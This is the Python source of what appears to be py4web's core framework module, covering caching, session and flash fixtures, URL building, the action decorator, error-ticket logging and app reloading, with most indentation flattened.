bottle.DefaultConfig.max_memfile_size = 16 * 1024 * 1024
bottle.DefaultConfig.app_name_header = "HTTP_X_PY4WEB_APPNAME"
# apply DefaultConfig changes to default_app
bottle.default_app().setup()
__all__ = [
"render",
"DAL",
"Field",
"action",
"request",
"response",
"redirect",
"abort",
"HTTP",
"Session",
"Cache",
"Flash",
"user_in",
"Translator",
"URL",
"check_compatible",
"required_folder",
"wsgi",
]
PY4WEB_CMD = sys.argv[0]
REGEX_APPJSON = r"(^|\s|,)application/json(,|\s|$)"
DEFAULTS = dict(
PY4WEB_APPS_FOLDER="apps",
PY4WEB_SERVICE_FOLDER=".service",
PY4WEB_SERVICE_DB_URI="sqlite://service.storage",
)
HELPERS = {name: getattr(yatl.helpers, name) for name in yatl.helpers.__all__}
_DEFAULT_APP_ROOTS = set()
ART = r"""
██████╗ ██╗ ██╗██╗ ██╗██╗ ██╗███████╗██████╗
██╔══██╗╚██╗ ██╔╝██║ ██║██║ ██║██╔════╝██╔══██╗
██████╔╝ ╚████╔╝ ███████║██║ █╗ ██║█████╗ ██████╔╝
██╔═══╝ ╚██╔╝ ╚════██║██║███╗██║██╔══╝ ██╔══██╗
██║ ██║ ██║╚███╔███╔╝███████╗██████╔╝
╚═╝ ╚═╝ ╚═╝ ╚══╝╚══╝ ╚══════╝╚═════╝
Is still experimental...
"""
Field = pydal.Field
request = bottle.request
response = bottle.response
abort = bottle.abort
os.environ.update(
{key: value for key, value in DEFAULTS.items() if key not in os.environ}
)
os.environ["PY4WEB_PATH"] = str(pathlib.Path(__file__).resolve().parents[1])
# hold all framework hooks in one place
# NOTE: `after_request` hooks are not currently used
_REQUEST_HOOKS = types.SimpleNamespace(before=set())
def _before_request(*args, **kw):
    for h in _REQUEST_HOOKS.before:
        h(*args, **kw)
bottle.default_app().add_hook("before_request", _before_request)
def module2filename(module):
filename = os.path.join(*module.split(".")[1:])
filename = (
os.path.join(filename, "__init__.py")
if not filename.count(os.sep)
else filename + ".py"
)
return filename
def required_folder(*parts):
"""joins the args and creates the folder if not exists"""
path = os.path.join(*parts)
if not os.path.exists(path):
os.makedirs(path)
assert os.path.isdir(path), "%s is not a folder as required" % path
return path
def safely(func, exceptions=(Exception,), log=False, default=None):
"""
    runs func() and returns its value on success; if one of the given
    exceptions is raised, optionally logs it and returns default
    (calling it first if callable)
"""
try:
return func()
except exceptions as err:
if log:
            logging.warning(str(err))
return default() if callable(default) else default
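# Usage sketch for safely() (the file path is illustrative):
def _example_safely():
    return safely(
        lambda: open("/tmp/maybe-missing.txt").read(),
        exceptions=(OSError,),
        log=True,
        default="",
    )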
########################################################################################
# Implement an O(1) LRU cache and memoize with expiration and monitoring (using a linked list)
#########################################################################################
class Node:
def __init__(self, key=None, value=None, t=None, m=None, prev=None, next=None):
self.key, self.value, self.t, self.m, self.prev, self.next = (
key,
value,
t,
m,
prev,
next,
)
class Cache:
"""
O(1) caching object that remembers the 'size' most recent values
Example:
cache = Cache(size=1000)
        h = cache.get(filename, lambda: hash(
            open(filename).read()), 60, lambda: os.path.getmtime(filename))
        (computes and caches the hash of the file, but only re-reads the file if its
        mtime changes, and does not check the mtime more often than every 60 seconds;
        caches the 1000 most recent hashes)
"""
def __init__(self, size=1000):
self.free = size
self.head = Node()
self.tail = Node()
self.head.next = self.tail
self.tail.prev = self.head
self.mapping = {}
self.lock = threading.Lock()
def get(self, key, callback, expiration=3600, monitor=None):
"""If key not stored or key has expired and monitor == None or monitor() value has changed, returns value = callback()"""
node, t0 = self.mapping.get(key), time.time()
with self.lock:
if node:
# if a node was found remove it from storage
value, t, node.next.prev, node.prev.next = (
node.value,
node.t,
node.prev,
node.next,
)
else:
self.free -= 1
# check if something may invalidate cache
m = monitor() if monitor else None
# check if cache expired
if node and node.t + expiration < t0:
# if cache should always be invalidated or m changed
if m is None or node.m != m:
# ignore the value found
node = None
if node is None:
value, t = callback(), t0
# add the new node back into storage
with self.lock:
new_node = Node(key, value, t, m, prev=self.head, next=self.head.next)
self.mapping[key] = self.head.next = new_node.next.prev = new_node
if self.free < 0:
last_node = self.tail.prev
self.tail.prev, last_node.prev.next = last_node.prev, self.tail
del self.mapping[last_node.key]
self.free += 1
return value
def memoize(self, expiration=3600):
def decorator(func):
@functools.wraps(func)
def memoized_func(*args, **kwargs):
key = "%s:%s:%s:%s" % (func.__module__, func.__name__, args, kwargs)
return self.get(
key,
lambda args=args, kwargs=kwargs: func(*args, **kwargs),
expiration=expiration,
)
return memoized_func
return decorator
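# Usage sketch for Cache.memoize (the decorated function is illustrative;
# repeated calls with the same arguments within 60 seconds hit the cache):
_example_cache = Cache(size=100)

@_example_cache.memoize(expiration=60)
def _example_slow_square(x):
    time.sleep(0.1)  # stands in for an expensive computation
    return x * x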
#########################################################################################
# A Better JSON Serializer
#########################################################################################
def objectify(obj):
"""converts the obj(ect) into a json serializable object"""
if isinstance(obj, numbers.Integral):
return int(obj)
elif isinstance(obj, (numbers.Rational, numbers.Real)):
return float(obj)
elif isinstance(obj, (datetime.date, datetime.datetime, datetime.time)):
return obj.isoformat().replace("T", " ")
elif isinstance(obj, str):
return obj
elif isinstance(obj, dict):
return obj
elif hasattr(obj, "as_list"):
return obj.as_list()
elif hasattr(obj, "as_dict"):
return obj.as_dict()
elif hasattr(obj, "__iter__") or isinstance(obj, types.GeneratorType):
return list(obj)
elif hasattr(obj, "xml"):
return obj.xml()
elif isinstance(
obj, enum.Enum
): # Enum class handled specially to address self reference in __dict__
return dict(name=obj.name, value=obj.value, __class__=obj.__class__.__name__)
elif hasattr(obj, "__dict__") and hasattr(obj, "__class__"):
d = dict(obj.__dict__)
d["__class__"] = obj.__class__.__name__
return d
return str(obj)
def dumps(obj, sort_keys=True, indent=2):
return json.dumps(obj, default=objectify, sort_keys=sort_keys, indent=indent)
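# Example: the custom serializer handles values plain json.dumps would reject
# (datetimes become "YYYY-MM-DD HH:MM:SS" strings, iterables become lists):
def _example_dumps():
    print(dumps({
        "when": datetime.datetime(2020, 1, 1, 12, 30),
        "ids": (x for x in range(3)),
    }))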
#########################################################################################
# Base Fixture (database connections, templates, sessions, and requirements are fixtures)
#########################################################################################
class Fixture:
__request_master_ctx__ = threading.local()
__fixture_debug__ = False
@classmethod
def __init_request_ctx__(cls):
cls.__request_master_ctx__.request_ctx = dict()
@classmethod
def __mount_local__(cls, self, storage):
cls.__request_master_ctx__.request_ctx[self] = storage
@property
def _safe_local(self):
try:
ret = self.__request_master_ctx__.request_ctx[self]
except (KeyError, AttributeError) as err:
msg = "py4web hint: check @action.uses() for the missing fixture {}".format(
self
)
raise RuntimeError(msg) from err
return ret
@_safe_local.setter
def _safe_local(self, storage):
self.__mount_local__(self, storage)
def is_valid(self):
"""check if the fixture is valid in context"""
try:
self.__request_master_ctx__.request_ctx[self]
return True
except (KeyError, AttributeError) as err:
            logging.warning(
                "attempted access to fixture %s from outside a request",
                self.__class__.__name__,
)
return False
def on_request(self):
pass # called when a request arrives
def on_error(self):
pass # called when a request errors
def on_success(self, status):
pass # called when a request is successful
def finalize(self):
pass # called in any case at the end of a request
def transform(
self, output, shared_data=None
): # transforms the output, for example to apply template
return output
_REQUEST_HOOKS.before.add(Fixture.__init_request_ctx__)
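# Sketch of a custom fixture (hypothetical, not part of py4web): time each
# request and report the elapsed time in a response header.
class _ExampleTimerFixture(Fixture):
    def on_request(self):
        self._safe_local = types.SimpleNamespace(t0=time.time())

    def on_success(self, status):
        response.headers["X-Elapsed"] = "%.3f" % (time.time() - self._safe_local.t0)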
class Translator(pluralize.Translator, Fixture):
def on_request(self):
self.select(request.headers.get("Accept-Language", "en"))
def on_success(self, status):
response.headers["Content-Language"] = self.local.tag
class DAL(pydal.DAL, Fixture):
reconnect_on_request = True
def on_request(self):
if self.reconnect_on_request:
self._adapter.reconnect()
threadsafevariable.ThreadSafeVariable.restore(ICECUBE)
def on_error(self):
self.rollback()
def on_success(self, status):
self.commit()
# make sure some variables in pydal are thread safe
def thread_safe_pydal_patch():
Field = pydal.DAL.Field
tsafe_attrs = [
"readable",
"writable",
"default",
"filter_in",
"filter_out",
"label",
"update",
"requires",
"widget",
"represent",
]
for a in tsafe_attrs:
b = threadsafevariable.ThreadSafeVariable()
setattr(Field, a, b)
# hack 'copy.copy' behavior, since it makes a shallow copy,
# but ThreadSafe-attributes (see above) are class-level, so:
# no copy -> no attr in ICECUBE for the fresh one -> gevent-error on try to access to any of ThreadSafe-attributes
def field_copy(self):
# to prevent infinite recursion
# temporarily set __copy__ to None
me = self.__class__.__copy__
self.__class__.__copy__ = None
clone = copy.copy(self)
self.__class__.__copy__ = me
for a in tsafe_attrs:
setattr(clone, a, getattr(self, a))
return clone
# to avoid possible future problems
if hasattr(Field, "__copy__"):
raise RuntimeError("code fix required!")
setattr(Field, "__copy__", field_copy)
thread_safe_pydal_patch()
# this global object will be used to store their state to restore it for every http request
ICECUBE = {}
#########################################################################################
# Flash Fixture
#########################################################################################
class Flash(Fixture):
"""
flash = Flash()
@action('index')
@action.uses(flash)
def index():
flash.set('hello', _class='important')
return dict()
Flash messages are added to the dict and, upon redirect, carry forward
Also notice all Flash objects share the same threading local so act as singletons
"""
    # this essentially makes flash a singleton
# necessary because auth defines its own flash
# possible because flash does not depend on the app
@property
def local(self):
return self._safe_local
def on_request(self):
self._safe_local = types.SimpleNamespace()
# when a new request arrives we look for a flash message in the cookie
flash = request.get_cookie("py4web-flash")
if flash:
self.local.flash = json.loads(flash)
else:
self.local.flash = None
def on_success(self, status):
# if we redirect and have a flash message we move it to the session
if status == 303 and self.local.flash:
response.set_cookie("py4web-flash", json.dumps(self.local.flash), path="/")
else:
response.delete_cookie("py4web-flash", path="/")
def finalize(self):
"""Clears the local to prevent leakage."""
self.local.__dict__.clear()
def set(self, message, _class="", sanitize=True):
# we set a flash message
if sanitize:
message = yatl.sanitizer.xmlescape(message)
self.local.flash = {"message": message, "class": _class}
def transform(self, data, shared_data=None):
# if we have a valid flash message, we inject it in the response dict
if isinstance(data, dict):
if "flash" not in data:
data["flash"] = self.local.flash or ""
else:
if self.local.flash is not None:
response.headers["component-flash"] = json.dumps(self.local.flash)
self.local.flash = None
return data
#########################################################################################
# The Template Renderer Fixture
#########################################################################################
class RenoirXMLEscapeMixin:
def _escape_data(self, data):
"""Allows Renoir to convert yatl helpers to strings"""
return safely(
lambda: data.xml(), default=lambda: self._to_html(self._to_unicode(data))
)
class RenoirCustomWriter(RenoirXMLEscapeMixin, renoir.writers.Writer):
...
class RenoirCustomEscapeAllWriter(RenoirXMLEscapeMixin, renoir.writers.EscapeAllWriter):
...
class Renoir(renoir.Renoir):
"""Custom Renoir Engine that understands yatl helpers"""
_writers = {
renoir.constants.ESCAPES.common: RenoirCustomWriter,
renoir.constants.ESCAPES.all: RenoirCustomEscapeAllWriter,
}
def render(
content=None,
filename=None,
path=".",
context={},
delimiters="[[ ]]",
cached_renoir_engines=Cache(100),
):
"""
    renders the template using Renoir, same API as yatl.render; caches both
    the Renoir engine and the source files
"""
engine = cached_renoir_engines.get(
(path, delimiters),
lambda: Renoir(path=path, delimiters=delimiters.split(" "), reload=True),
)
if content is not None:
return engine._render(content, context=context)
return engine.render(filename, context=context)
class Template(Fixture):
cache = Cache(100)
def __init__(self, filename, path=None, delimiters="[[ ]]"):
self.filename = filename
self.path = path
self.delimiters = delimiters
def transform(self, output, shared_data=None):
if not isinstance(output, dict):
return output
context = dict(request=request)
context.update(HELPERS)
context.update(URL=URL)
if shared_data:
context.update(shared_data.get("template_context", {}))
context.update(output)
context["__vars__"] = output
app_folder = os.path.join(os.environ["PY4WEB_APPS_FOLDER"], request.app_name)
path = self.path or os.path.join(app_folder, "templates")
filename = os.path.join(path, self.filename)
if not os.path.exists(filename):
generic_filename = os.path.join(path, "generic.html")
if os.path.exists(generic_filename):
filename = generic_filename
output = render(
filename=filename, path=path, context=context, delimiters=self.delimiters
)
return output
#########################################################################################
# The Session Fixture
#########################################################################################
class Session(Fixture):
# All apps share the same default secret if not specified.
# important for _dashboard reload
# the actual value is loaded from a file
SECRET = None
@property
def local(self):
return self._safe_local
def __init__(
self,
secret=None,
expiration=None,
algorithm="HS256",
storage=None,
same_site="Lax",
):
"""
        secret is the shared key used to encrypt the session (using algorithm)
        expiration is in seconds
        (optional) storage must have get(key) and set(key, value, expiration) methods
        if storage is not provided the session is stored in a jwt cookie; otherwise
        the session data is stored in storage under its uuid key and the uuid is
        stored in the cookie
"""
# assert Session.SECRET, "Missing Session.SECRET"
self.secret = secret or Session.SECRET
self.expiration = expiration
self.algorithm = algorithm
self.storage = storage
self.same_site = same_site
if isinstance(storage, Session):
self.__prerequisites__ = [storage]
if hasattr(storage, "__prerequisites__"):
self.__prerequisites__ = storage.__prerequisites__
def initialize(self, app_name="unknown", data=None, changed=False, secure=False):
self._safe_local = types.SimpleNamespace()
local = self.local
local.changed = changed
local.data = data or {}
local.session_cookie_name = "%s_session" % app_name
local.secure = secure
def load(self):
self.initialize(
app_name=request.app_name,
changed=False,
secure=request.url.startswith("https"),
)
self_local = self.local
raw_token = request.get_cookie(
self_local.session_cookie_name
) or request.query.get("_session_token")
if not raw_token and request.method in {"POST", "PUT", "DELETE", "PATCH"}:
raw_token = (
request.forms
and request.forms.get("_session_token")
or request.json
and request.json.get("_session_token")
)
if Fixture.__fixture_debug__:
logging.debug("Session token found %s", raw_token)
if raw_token:
token_data = raw_token.encode()
try:
if self.storage:
json_data = self.storage.get(token_data)
if json_data:
self_local.data = json.loads(json_data)
else:
self_local.data = jwt.decode(
token_data, self.secret, algorithms=[self.algorithm]
)
if self.expiration is not None and self.storage is None:
assert self_local.data["timestamp"] > time.time() - int(
self.expiration
)
assert self.get_data().get("secure") == self_local.secure
except Exception as err:
if Fixture.__fixture_debug__:
logging.debug("Session error %s", err)
if "uuid" not in self.get_data():
self.clear()
def get_data(self):
return getattr(self.local, "data", {})
def save(self):
self_local = self.local
self_local.data["timestamp"] = time.time()
if self.storage:
cookie_data = self_local.data["uuid"]
self.storage.set(cookie_data, json.dumps(self_local.data), self.expiration)
else:
cookie_data = jwt.encode(
self_local.data, self.secret, algorithm=self.algorithm
)
if isinstance(cookie_data, bytes):
cookie_data = cookie_data.decode()
if Fixture.__fixture_debug__:
logging.debug("Session stored %s", cookie_data)
response.set_cookie(
self_local.session_cookie_name,
cookie_data,
path="/",
secure=self_local.secure,
same_site=self.same_site,
)
def get(self, key, default=None):
return self.get_data().get(key, default)
def __getitem__(self, key):
return self.get_data()[key]
def __delitem__(self, key):
if key in self.get_data():
self.local.changed = True
del self.local.data[key]
def __setitem__(self, key, value):
self.local.changed = True
self.local.data[key] = value
def keys(self):
return self.get_data().keys()
def __iter__(self):
yield from self.get_data().items()
def clear(self):
"""Produces a brand-new session."""
self_local = self.local
self_local.changed = True
self_local.data.clear()
self_local.data["uuid"] = str(uuid.uuid1())
self_local.data["secure"] = self_local.secure
def on_request(self):
self.load()
def on_error(self):
if self.local.changed:
self.save()
def on_success(self, status):
if self.local.changed:
self.save()
#########################################################################################
# The URL Helper
#########################################################################################
def URL(
*parts,
vars=None,
hash=None,
scheme=False,
signer=None,
use_appname=None,
static_version=None,
):
"""
Examples:
URL('a','b',vars=dict(x=1),hash='y') -> /{script_name?}/{app_name?}/a/b?x=1#y
URL('a','b',vars=dict(x=1),scheme=None) -> //{domain}/{script_name?}/{app_name?}/a/b?x=1
URL('a','b',vars=dict(x=1),scheme=True) -> http://{domain}/{script_name?}/{app_name?}/a/b?x=1
URL('a','b',vars=dict(x=1),scheme='https') -> https://{domain}/{script_name?}/{app_name?}/a/b?x=1
URL('a','b',vars=dict(x=1),use_appname=False) -> /{script_name?}/a/b?x=1
"""
if use_appname is None:
# force use_appname on domain-unmapped apps
use_appname = not request.environ.get("HTTP_X_PY4WEB_APPNAME")
if use_appname:
# app_name is not set by py4web shell
app_name = getattr(request, "app_name", None)
has_appname = use_appname and app_name
script_name = (
request.environ.get("SCRIPT_NAME", "")
or request.environ.get("HTTP_X_SCRIPT_NAME", "")
).rstrip("/")
if parts and parts[0].startswith("/"):
prefix = ""
elif has_appname and app_name != "_default":
prefix = "%s/%s/" % (script_name, app_name)
else:
prefix = "%s/" % script_name
broken_parts = []
for part in parts:
broken_parts += str(part).rstrip("/").split("/")
if static_version != "" and broken_parts and broken_parts[0] == "static":
if not static_version:
# try to retrieve from __init__.py
app_module = "apps.%s" % app_name if has_appname else "apps"
try:
static_version = getattr(
sys.modules[app_module], "__static_version__", None
)
except KeyError:
static_version = None
if static_version:
broken_parts.insert(1, "_" + static_version)
url = prefix + "/".join(map(urllib.parse.quote, broken_parts))
# Signs the URL if required. Copy vars into urlvars not to modify it.
urlvars = dict(vars) if vars else {}
if signer:
# Note that we need to sign the non-urlencoded URL, since
# at verification time, it will be already URLdecoded.
signer.sign(prefix + "/".join(broken_parts), urlvars)
if urlvars:
url += "?" + "&".join(
"%s=%s" % (k, urllib.parse.quote(str(v))) for k, v in urlvars.items()
)
if hash:
url += "#%s" % hash
if scheme is not False:
original_url = request.environ.get("HTTP_ORIGIN") or request.url
orig_scheme, _, domain = original_url.split("/", 3)[:3]
if scheme is True:
scheme = orig_scheme
elif scheme is None:
scheme = ""
else:
scheme += ":"
url = "%s//%s%s" % (scheme, domain, url)
return url
#########################################################################################
# The Action Decorator
#########################################################################################
class HTTP(BaseException):
    """Our HTTP exception does not delete cookies and headers like bottle.HTTPResponse does,
    since it is considered a success, not a failure"""
    class Type:
        success = "success"
        error = "error"
    def __init__(self, status, type=Type.success):
self.status = status
self.type = type
def redirect(location):
"""our redirect does not delete cookies and headers like bottle.HTTPResponse does;
it is considered a success, not failure"""
response.headers["Location"] = location
raise HTTP(303)
class action:
"""@action(...) is a decorator for functions to be exposed as actions"""
registered = set()
app_name = "_default"
def __init__(self, path, **kwargs):
self.path = path
self.kwargs = kwargs
@staticmethod
def uses(*fixtures_in):
"""Find all fixtures, including dependencies, topologically sorted"""
fixtures = []
reversed_fixtures = []
stack = list(fixtures_in)
while stack:
fixture = stack.pop()
reversed_fixtures.append(fixture)
stack.extend(getattr(fixture, "__prerequisites__", ()))
for fixture in reversed(reversed_fixtures):
if isinstance(fixture, str):
fixture = Template(fixture)
if fixture not in fixtures:
fixtures.append(fixture)
def decorator(func):
if Fixture.__fixture_debug__:
# in debug mode log all calls to fixtures
def call(obj, f, args=()):
logging.debug("Calling %s.%s", obj.__class__.__name__, f)
return getattr(obj, f)(*args)
else:
def call(obj, f, args=()):
return getattr(obj, f)(*args)
@functools.wraps(func)
def wrapper(*args, **kwargs):
# data shared by all fixtures in the pipeline for each request
shared_data = {"template_context": {}}
try:
for obj in fixtures:
call(obj, "on_request")
ret = func(*args, **kwargs)
for obj in fixtures:
ret = call(obj, "transform", (ret, shared_data))
for obj in fixtures:
call(obj, "on_success", (200,))
return ret
except HTTP as http:
if http.type == http.Type.success:
for obj in fixtures:
call(obj, "on_success", (http.status,))
else:
                        for obj in fixtures:
call(obj, "on_error")
raise
except Exception:
for obj in fixtures:
call(obj, "on_error")
raise
finally:
for obj in fixtures:
call(obj, "finalize")
# Clears the current object to prevent leakage.
return wrapper
return decorator
@staticmethod
def requires(*requirements):
"""Enforces requirements or calls bottle.abort(401)"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
for requirement in requirements:
if not requirement():
bottle.abort(401)
return func(*args, **kwargs)
return wrapper
return decorator
@staticmethod
def catch_errors(app_name, func):
"""Catches and logs errors in an action; also sets request.app_name"""
@functools.wraps(func)
def wrapper(*func_args, **func_kwargs):
try:
request.app_name = app_name
ret = func(*func_args, **func_kwargs)
if isinstance(ret, dict):
response.headers["Content-Type"] = "application/json"
ret = dumps(ret)
return ret
except HTTP as http:
response.status = http.status
ret = getattr(http, "body", "")
http_headers = getattr(http, "headers", None)
if http_headers:
response.headers.update(http_headers)
return ret
except bottle.HTTPResponse:
raise
except Exception:
snapshot = get_error_snapshot()
logging.error(snapshot["traceback"])
ticket_uuid = error_logger.log(request.app_name, snapshot) or "unknown"
raise bottle.HTTPResponse(
body=error_page(
500,
button_text=ticket_uuid,
href="/_dashboard/ticket/" + ticket_uuid,
),
status=500,
)
return wrapper
def __call__(self, func):
"""Building the decorator"""
app_name = action.app_name
if self.path[0] == "/":
path = self.path.rstrip("/") or "/"
else:
if app_name == "_default":
base_path = ""
_DEFAULT_APP_ROOTS.add(self.path.split("/", 1)[0])
else:
base_path = f"/{app_name}"
path = (f"{base_path}/{self.path}").rstrip("/")
if func not in self.registered:
func = action.catch_errors(app_name, func)
func = bottle.route(path, **self.kwargs)(func)
if path.endswith("/index"): # /index is always optional
func = bottle.route(path[:-6] or "/", **self.kwargs)(func)
self.registered.add(func)
return func
def user_in(session):
def requirement():
session.on_request()
return session.get("user", None) is not None
return requirement
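# Putting the pieces together, as a sketch (the route, template name and
# session secret are illustrative):
#
#   session = Session(secret="my secret")
#
#   @action("profile")
#   @action.uses("profile.html", session)
#   @action.requires(user_in(session))
#   def profile():
#       return dict(user=session.get("user"))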
#########################################################################################
# Monkey Patch: Cookies
#########################################################################################
http.cookies.Morsel._reserved["same-site"] = "SameSite"
#########################################################################################
# Monkey Patch: ssl bug for gevent
#########################################################################################
__ssl__ = __import__("ssl")
_ssl = getattr(__ssl__, "_ssl") or getattr(__ssl__, "_ssl2")
def new_sslwrap(
sock,
server_side=False,
keyfile=None,
certfile=None,
cert_reqs=__ssl__.CERT_NONE,
ssl_version=__ssl__.PROTOCOL_SSLv23,
ca_certs=None,
ciphers=None,
):
context = __ssl__.SSLContext(ssl_version)
context.verify_mode = cert_reqs or __ssl__.CERT_NONE
if ca_certs:
context.load_verify_locations(ca_certs)
if certfile:
context.load_cert_chain(certfile, keyfile)
if ciphers:
context.set_ciphers(ciphers)
caller_self = inspect.currentframe().f_back.f_locals["self"]
return context._wrap_socket(sock, server_side=server_side, ssl_sock=caller_self)
#########################################################################################
# Error Handling
#########################################################################################
def get_error_snapshot(depth=5):
"""Return a dict describing a given traceback (based on cgitb.text)."""
tb = traceback.format_exc()
errorlog = os.environ.get("PY4WEB_ERRORLOG")
if errorlog:
msg = f"[{datetime.datetime.now().isoformat()}]: {tb}\n"
if errorlog == ":stderr":
sys.stderr.write(msg)
elif errorlog == ":stdout":
sys.stdout.write(msg)
elif errorlog == "tickets_only":
pass
else:
with portalocker.Lock(errorlog, "a", timeout=2) as fp:
fp.write(msg)
etype, evalue, etb = sys.exc_info()
if isinstance(etype, type):
etype = etype.__name__
data = {}
data["timestamp"] = datetime.datetime.utcnow().isoformat().replace("T", " ")
data["python_version"] = sys.version
platform_keys = [
"machine",
"node",
"platform",
"processor",
"python_branch",
"python_build",
"python_compiler",
"python_implementation",
"python_revision",
"python_version",
"python_version_tuple",
"release",
"system",
"uname",
"version",
]
data["platform_info"] = {key: getattr(platform, key)() for key in platform_keys}
data["os_environ"] = {key: str(value) for key, value in os.environ.items()}
data["traceback"] = tb
data["exception_type"] = str(etype)
data["exception_value"] = str(evalue)
    # Loop over the stack frames
items = inspect.getinnerframes(etb, depth)
del etb # Prevent circular references that would cause memory leaks
data["stackframes"] = stackframes = []
for frame, file, lnum, func, lines, idx in items:
file = file and os.path.abspath(file) or "?"
args, varargs, varkw, locals = inspect.getargvalues(frame)
# Basic frame information
f = {"file": file, "func": func, "lnum": lnum}
f["code"] = lines
# FIXME: disable this for now until we understand why this goes into infinite loop
if False:
line_vars = cgitb.scanvars(
lambda: linecache.getline(file, lnum), frame, locals
)
# Dump local variables (referenced in current line only)
f["vars"] = {
key: repr(value)
for key, value in locals.items()
if not key.startswith("__")
}
stackframes.append(f)
return data
class SimpleErrorLogger:
def log(self, app_name, snapshot):
"""logs the error"""
logging.error("%s error:\n%s" % (app_name, snapshot["traceback"]))
return None
class DatabaseErrorLogger:
def __init__(self):
"""creates the py4web_error table in the service database"""
uri = os.environ["PY4WEB_SERVICE_DB_URI"]
folder = os.environ["PY4WEB_SERVICE_FOLDER"]
self.db = DAL(uri, folder=folder)
self.db.define_table(
"py4web_error",
Field("uuid"),
Field("app_name"),
Field("method"),
Field("path", "string"),
Field("timestamp", "datetime"),
Field("client_ip", "string"),
Field("error", "string"),
Field("snapshot", "json"),
)
self.db.commit()
def log(self, app_name, error_snapshot):
"""store error snapshot (ticket) in the database"""
ticket_uuid = str(uuid.uuid4())
try:
self.db.py4web_error.insert(
uuid=ticket_uuid,
app_name=app_name,
method=request.method,
path=request.path,
timestamp=datetime.datetime.utcnow(),
client_ip=request.environ.get("REMOTE_ADDR"),
error=error_snapshot["exception_value"],
snapshot=error_snapshot,
)
self.db.commit()
return ticket_uuid
except Exception as err:
logging.error(str(err))
self.db.rollback()
return None
def get(self, ticket_uuid=None):
"""retrieve a ticket from error database"""
db = self.db
if ticket_uuid:
query, orderby = db.py4web_error.uuid == ticket_uuid, None
rows = db(query).select(orderby=orderby, limitby=(0, 1)).as_list()
else:
orderby = ~db.py4web_error.timestamp
groupby = db.py4web_error.path | db.py4web_error.error
query = (
db.py4web_error.timestamp
> datetime.datetime.now() - datetime.timedelta(days=7)
)
fields = [field for field in db.py4web_error if not field.type == "json"]
fields.append(db.py4web_error.id.count())
list_rows = (
db(query).select(*fields, orderby=orderby, groupby=groupby).as_list()
)
rows = []
for item in list_rows:
row = item["py4web_error"]
row["count"] = item["_extra"][str(db.py4web_error.id.count())]
rows.append(row)
return rows if not ticket_uuid else rows[0] if rows else None
def clear(self):
"""erase all tickets from database"""
db = self.db
db(db.py4web_error).delete()
self.db.commit()
class ErrorLogger:
"""
To create your own custom logger for an app:
class MyLogger:
        def log(self, app_name, error_snapshot):
...
return ticket_uuid
error_logger.plugins['app_name'] = MyLogger()
"""
def __init__(self):
self.fallback_logger = SimpleErrorLogger()
self.database_logger = None
self.plugins = {}
def initialize(self):
"""try inizalize database if we have service folder"""
self.database_logger = safely(DatabaseErrorLogger, log=True)
def _get_logger(self, app_name):
"""get the appropriate logger for the app"""
return (
self.plugins.get(app_name) or self.database_logger or self.fallback_logger
)
def log(self, app_name, error_snapshot):
"""log the error snapshot"""
logger = self._get_logger(app_name)
ticket_uuid = safely(lambda: logger.log(app_name, error_snapshot))
if not ticket_uuid:
self.fallback_logger.log(app_name, error_snapshot)
return ticket_uuid
error_logger = ErrorLogger()
#########################################################################################
# Loading & Reloading Logic
#########################################################################################
class Reloader:
ROUTES = []
MODULES = {}
ERRORS = {}
@staticmethod
def install_reloader_hook():
# used by watcher
def hook(*a, **k):
app_name = request.path.split("/")[1]
if not app_name or app_name in _DEFAULT_APP_ROOTS:
app_name = "_default"
if DIRTY_APPS.get(app_name):
Reloader.import_app(app_name)
DIRTY_APPS[app_name] = False
## APP_WATCH tasks, if used by any app
try_app_watch_tasks()
_REQUEST_HOOKS.before.add(hook)
@staticmethod
def clear_routes(app_name=""):
app_root = app_name
if app_root and app_root[0] != "/":
app_root = f"/{app_root}"
routes = f"{app_root}/*"
remove_route = bottle.default_app().router.remove
remove_route(routes)
if app_name:
remove_route(app_root)
if app_name == "_default":
                for _ in _DEFAULT_APP_ROOTS:
                    remove_route(f"/{_}")
                    remove_route(f"/{_}/*")
remove_route("/")
_DEFAULT_APP_ROOTS.clear()
else:
_DEFAULT_APP_ROOTS.clear()
@staticmethod
def import_apps():
"""Import or reimport modules and exposed static files"""
Reloader.clear_routes()
folder = os.environ["PY4WEB_APPS_FOLDER"]
        # on the first run, load the dummy top-level "apps" module
if not Reloader.MODULES:
path = os.path.join(folder, "__init__.py")
loader = importlib.machinery.SourceFileLoader("apps", path)
loader.load_module()
# Then load all the apps as submodules
for app_name in os.listdir(folder):
Reloader.import_app(app_name, clear_before_import=False)
@staticmethod
def import_app(app_name, clear_before_import=True):
if clear_before_import:
Reloader.clear_routes(app_name)
folder = os.environ["PY4WEB_APPS_FOLDER"]
path = os.path.join(folder, app_name)
init = os.path.join(path, "__init__.py")
if os.path.isdir(path) and not path.endswith("__") and os.path.exists(init):
action.app_name = app_name
module_name = "apps.%s" % app_name
def clear_modules():
# all files/submodules
names = [
name
for name in sys.modules
if (name + ".").startswith(module_name + ".")
]
for name in names:
del sys.modules[name]
try:
module = Reloader.MODULES.get(app_name)
if not module:
click.echo("[ ] loading %s ..." % app_name)
else:
click.echo("[ ] reloading %s ..." % app_name)
# forget the module
del Reloader.MODULES[app_name]
clear_modules()
load_module_stdout = io.StringIO()
with redirect_stdout(load_module_stdout):
module = importlib.machinery.SourceFileLoader(
module_name, init
).load_module()
load_module_message = load_module_stdout.getvalue()
if len(load_module_message):
click.secho("\x1b[A stdout %s " % app_name, fg="yellow")
click.echo(load_module_message)
click.secho("\x1b[A[X] loaded %s " % app_name, fg="green")
Reloader.MODULES[app_name] = module
Reloader.ERRORS[app_name] = None
except Exception as err:
Reloader.ERRORS[app_name] = traceback.format_exc()
error_logger.log(app_name, get_error_snapshot())
click.secho(
"\x1b[A[FAILED] loading %s (%s)" % (app_name, err),
fg="red",
)
# clear all files/submodules if the loading fails
clear_modules()
return None
# Expose static files with support for static asset management
static_folder = os.path.join(path, "static")
if os.path.exists(static_folder):
app_name = path.split(os.path.sep)[-1]
if app_name == "_default":
prefix = ""
_DEFAULT_APP_ROOTS.add("static")
else:
prefix = f"/{app_name}"
@bottle.route(prefix + r"/static/<re((_\d+(\.\d+){2}/)?)><fp.path()>")
def server_static(fp, static_folder=static_folder):
filename = fp
response.headers.setdefault("Pragma", "cache")
response.headers.setdefault("Cache-Control", "private")
return bottle.static_file(filename, root=static_folder)
# Register routes list
app = bottle.default_app()
routes = []
for route in app.routes.values():
for method, method_obj in route.methods.items():
func = method_obj.handler
rule = route.rule
# remove optional trailing / from rule
routes.append(
{
"rule": rule,
"method": method,
"filename": module2filename(func.__module__),
"action": func.__name__,
}
)
